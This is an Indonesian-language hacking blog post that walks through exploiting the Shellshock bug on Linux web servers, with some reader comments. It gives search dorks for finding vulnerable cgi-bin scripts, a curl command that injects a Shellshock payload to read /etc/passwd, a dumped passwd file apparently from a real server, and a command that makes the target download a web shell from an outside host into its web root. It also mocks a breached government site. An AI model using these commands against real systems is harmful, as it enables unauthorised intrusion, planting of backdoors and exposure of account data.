• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Shellshock Vulnerability Exploit on Linux Server

May 2, 2015 by Jack Wilder 2 Comments

Oke sebener nya ini bug lama sih. 2014 sudah dipublish. dan sudah banyak target vuln yang dipatch. tapi kenyataannya web Paspampres jebol gara gara bug lama ini. helehhh…. admin web Indo payah ! . Oke sekarang saya mau jelasin sedikit cara exploitbug Shellshock ini.
Bahan :
VPS . saran sih pake VPS, kalo enggak, ribet mesti ip statis, ngubah port, konek netcat dll. Ane juga gak mudeng.
PHP Exploit :
disini
Dork :
inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi 
use your brain, bitch !

Oke saya anggep sudah dapet target vuln .
contoh aja deh :
localhost/cgi-bin/test-cgi
Sekarang kita login vps dulu.
simpan exploit php diatas di folder root. nyari gampang aja. kasih nama xxx.php
Setelah itu, kita masukkan command berikut .
curl -A “() { :; }; echo; /bin/cat /etc/passwd” http://localhost/cgi-bin/test-cgi > jembot.txt

Ini untuk melihat isi dari file etc/passwd dan disimpan di file dengan nama jembot.txt

sekarang masukkan command cat jembot.txt
Pastikan isi dari etc/passwd nya muncul disini.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
oracle:x:500:500::/home/oracle:/bin/bash
asywprod:x:503:502:asycuda world live operations:/home2/asywprod:/bin/bash
asy:x:504:504:asycuda prototype owner:/home2/asy:/bin/bash
asyw:x:505:502:Asycuda super user:/home2/asyw:/bin/bash
backup:x:506:506::/home/backup:/bin/bash

Tujuannya untuk melitah path public_html dari web yang akan kita exploit tadi.
Misalkan kita sudah tau kalo path web nya ada di /home2/asy/public_html/

maka masukkan command :
php xxx.php -u http://localhost/cgi-bin/test-cgi -c “wget http://yuyudhn1337.org/exp/cmdshell.txt -O /home2/asy/public_html/memek.php”

Pastikan sampai ada notif “command send to server”

Cek shellmu akan berada di localhost/memek.php
Sekian tutor kali ini semoga bermanfaat.

NB : copas tanpa sumber, mandul. thanks

Filed Under: Uncategorized Tagged With: Bugs, Exploit, Hacking, Linux

Reader Interactions

Comments

  1. Bagas Adjie says

    May 2, 2015 at 11:20 am

    ini toh yg ngesoceng ratusan akun >.<
    ajarin gw dong :'(

    Reply
    • chiaki says

      May 2, 2015 at 11:39 am

      jembut -_-

      Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Reverse Shell From Local File Inclusion Exploit

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Exploit WPStore Themes Upload Vulnerability

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Tutorial Deface Menutup Halaman Depan Situs Target dengan JS Overlay

WordPress Army Knife CSRF File Upload Vulnerability

Tumblr Custom Domain or Subdomain Takeover

FCKeditor Bypass Shell Upload With Burp Suite Intercept

WordPress 4.7.0/4.7.1 Content Injection Exploit

Deteksi Kerentanan Execution After Redirect (EAR)

LinuxSec / 14 queries in 0.13 seconds